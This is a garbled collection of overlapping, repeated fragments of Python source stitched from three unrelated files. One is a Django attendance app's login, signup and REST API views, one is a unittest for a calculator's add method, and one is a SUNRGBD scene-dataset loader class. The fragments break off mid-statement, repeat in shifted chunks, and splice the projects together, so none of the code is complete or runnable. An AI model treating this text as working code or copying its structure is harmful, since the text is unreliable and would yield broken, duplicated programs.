"return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html')",
"return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer",
"class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView):",
"Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView):",
"######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class=",
"context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method ==",
"forms from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators",
"serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset",
"Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView):",
"= request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user is not",
"forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ##########################",
"'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method",
"return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request):",
"queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer",
"Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class",
"serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset =",
"SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView):",
"user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return",
"SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class",
"password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form':",
"class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all()",
"class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): #",
"SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset =",
"serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer",
"from .models import Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer,",
"logout(request) # username = password = '' if request.POST: username = request.POST['username'] password",
"= '' if request.POST: username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username,",
"Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def",
"= Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def",
"user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request,",
"user = authenticate(username=username, password=password) if user is not None: if user.is_active: login(request, user)",
"serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer",
"get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer def get_queryset(self): return",
"FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class",
"template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html'",
"import TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required from",
"login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return"
"from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self):",
"\"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be",
"MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case to validate",
"suite for add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase):",
"test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\")",
"MyCalc() def test_add(self): \"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10,",
"two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if __name__ == '__main__':",
"for add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def",
"def test_add(self): \"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5),",
"validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if __name__ ==",
"myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\"",
"def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case to validate two",
"case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if",
"<filename>Chapter05/myunittest/tests/tests_mycalc/test_mycalc_add.py # test_mycalc_add.py test suite for add class method import unittest from myunittest.src.mycalc.mycalc",
"# test_mycalc_add.py test suite for add class method import unittest from myunittest.src.mycalc.mycalc import",
"MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case",
"add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self):",
"test_add(self): \"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should",
"class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc",
"test suite for add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class",
"unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def",
"self.calc = MyCalc() def test_add(self): \"\"\" test case to validate two positive numbers\"\"\"",
"= MyCalc() def test_add(self): \"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15,",
"setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case to validate two positive",
"to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if __name__",
"positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if __name__ == '__main__': unittest.main()",
"method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc =",
"import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test",
"class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case to",
"import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc()",
"test_mycalc_add.py test suite for add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc"
"def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def",
"Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self):",
"split): self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name):",
"@label.setter def label(self, label): self._label = label @property def img_name(self): return self._img_name @img_name.setter",
"7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD')",
"extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self):",
"return self._split @split.setter def split(self, split): self._split = split @property def sequence_name(self): return",
"self._img_name = img_name self._split = split self._sequence_name = None self._intrinsics = None self._extrinsics",
"\"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\"",
"rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB:",
"for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = []",
"in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in",
"False def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\')",
"path): self._path = path @property def label(self): return self._label @label.setter def label(self, label):",
"self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt",
"set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in names: _id = class_name_to_id[name]",
"names = [] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names)",
"= params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/'",
"= [] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def",
"@data_type.setter def data_type(self, data_type): self._data_type = data_type @property def path(self): return self._path @path.setter",
"= K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') + '_'",
"\"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for k, v",
"= label self._img_name = img_name self._split = split self._sequence_name = None self._intrinsics =",
"= 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path,",
"rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self,",
"def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') -",
"get_class_names(ids): names = [] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return",
"@property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property",
"as np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\",",
"img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join(",
"def label(self, label): self._label = label @property def img_name(self): return self._img_name @img_name.setter def",
"sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self):",
"self._data_type = data_type @property def path(self): return self._path @path.setter def path(self, path): self._path",
"class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type = data_type self._path",
"data_type @property def path(self): return self._path @path.setter def path(self, path): self._path = path",
"None self._intrinsics = None self._extrinsics = None self._Rtilt = None self._K = None",
"return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return",
"\"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id =",
"class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat ==",
"ids = [] for name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids,",
"\"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\":",
"\"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\":",
"= set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in names: _id =",
"data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property def path(self):",
"for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for",
"self._extrinsics = None self._Rtilt = None self._K = None @property def data_type(self): return",
"\"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\",",
"path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path,",
"split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class",
"def img_name(self, img_name): self._img_name = img_name @property def split(self): return self._split @split.setter def",
"__init__(self, data_type, img_name, path, label, split): self._data_type = data_type self._path = path self._label",
"@img_name.setter def img_name(self, img_name): self._img_name = img_name @property def split(self): return self._split @split.setter",
"img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics",
"= rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def",
"import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\",",
"img_name, path, label, split): self._data_type = data_type self._path = path self._label = label",
"def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def",
"def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def",
"= None self._intrinsics = None self._extrinsics = None self._Rtilt = None self._K =",
"self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics",
"self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name",
"@property def split(self): return self._split @split.setter def split(self, split): self._split = split @property",
"\"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for k, v in class_id_to_name.items()}",
"self._path @path.setter def path(self, path): self._path = path @property def label(self): return self._label",
"path(self): return self._path @path.setter def path(self, path): self._path = path @property def label(self):",
"\"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\",",
"img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics =",
"label, split): self._data_type = data_type self._path = path self._label = label self._img_name =",
"path, label, split): self._data_type = data_type self._path = path self._label = label self._img_name",
"\"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id",
"<filename>src/utils/sunrgbd.py<gh_stars>1-10 import os import numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name =",
"self._data_type = data_type self._path = path self._label = label self._img_name = img_name self._split",
"get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name def",
"in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names =",
"start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind]",
"np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label),",
"params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name",
"instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split)",
"split self._sequence_name = None self._intrinsics = None self._extrinsics = None self._Rtilt = None",
"data_type): self._data_type = data_type @property def path(self): return self._path @path.setter def path(self, path):",
"split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path =",
"None self._extrinsics = None self._Rtilt = None self._K = None @property def data_type(self):",
"extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type",
"sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics",
"v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name",
"\"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\":",
"self._path = path @property def label(self): return self._label @label.setter def label(self, label): self._label",
"= {v: k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names):",
"dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name",
"return self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name def is_scene_challenge_category(self):",
"@property def label(self): return self._label @label.setter def label(self, label): self._label = label @property",
"@path.setter def path(self, path): self._path = path @property def label(self): return self._label @label.setter",
"_is_category_available(cat_name): for cat in class_names: if cat == cat_name: return True return False",
"class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id in",
"+ rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type ==",
"return False def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind =",
"numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\":",
"ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id in ids:",
"label): self._label = label @property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name):",
"= data_type @property def path(self): return self._path @path.setter def path(self, path): self._path =",
"\"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\",",
"name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names",
"k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids =",
"img_name self._split = split self._sequence_name = None self._intrinsics = None self._extrinsics = None",
"\"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for k,",
"os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics =",
"cat == cat_name: return True return False def load_props(params, path, split): start_ind =",
"path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path,",
"'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics",
"\"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\":",
"SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type = data_type self._path =",
"img_name(self, img_name): self._img_name = img_name @property def split(self): return self._split @split.setter def split(self,",
"\"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\",",
"intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics):",
"= path @property def label(self): return self._label @label.setter def label(self, label): self._label =",
"sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics):",
"= { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\":",
"= None self._Rtilt = None self._K = None @property def data_type(self): return self._data_type",
"\"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\":",
"img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path,",
"self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property def path(self): return self._path",
"path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path =",
"def path(self, path): self._path = path @property def label(self): return self._label @label.setter def",
"self._intrinsics = None self._extrinsics = None self._Rtilt = None self._K = None @property",
"extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt",
"import numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\",",
"self._path = path self._label = label self._img_name = img_name self._split = split self._sequence_name",
"def path(self): return self._path @path.setter def path(self, path): self._path = path @property def",
"self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics",
"os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' +",
"data_type self._path = path self._label = label self._img_name = img_name self._split = split",
"os import numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\":",
"from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\",",
"np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat == cat_name: return True",
"self._label = label self._img_name = img_name self._split = split self._sequence_name = None self._intrinsics",
"= img_name @property def split(self): return self._split @split.setter def split(self, split): self._split =",
"return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type =",
"K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') + '_' +",
"def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def",
"= Rtilt @property def K(self): return self._K @K.setter def K(self, K): self._K =",
"= SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics",
"np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image",
"= split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name =",
"in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in",
"return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return",
"\"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" }",
"\"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\":",
"= np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path,",
"\"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\":",
"k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for",
"end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path",
"return self._K @K.setter def K(self, K): self._K = K def get_fullname(self): return self.label",
"\"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k",
"SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics =",
"1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path",
"def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def",
"label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name",
"self._K = None @property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type",
"intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics",
"return self._path @path.setter def path(self, path): self._path = path @property def label(self): return",
"load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1",
"return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property def path(self): return",
"label @property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name",
"data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name =",
"K(self, K): self._K = K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/',",
"= path self._label = label self._img_name = img_name self._split = split self._sequence_name =",
"None self._Rtilt = None self._K = None @property def data_type(self): return self._data_type @data_type.setter",
"= os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/'",
"'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image =",
"self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics",
"data_type(self, data_type): self._data_type = data_type @property def path(self): return self._path @path.setter def path(self,",
"= np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32)",
"sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self,",
"self._split @split.setter def split(self, split): self._split = split @property def sequence_name(self): return self._sequence_name",
"+ '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name def is_scene_challenge_category(self): return _is_category_available(self.label)",
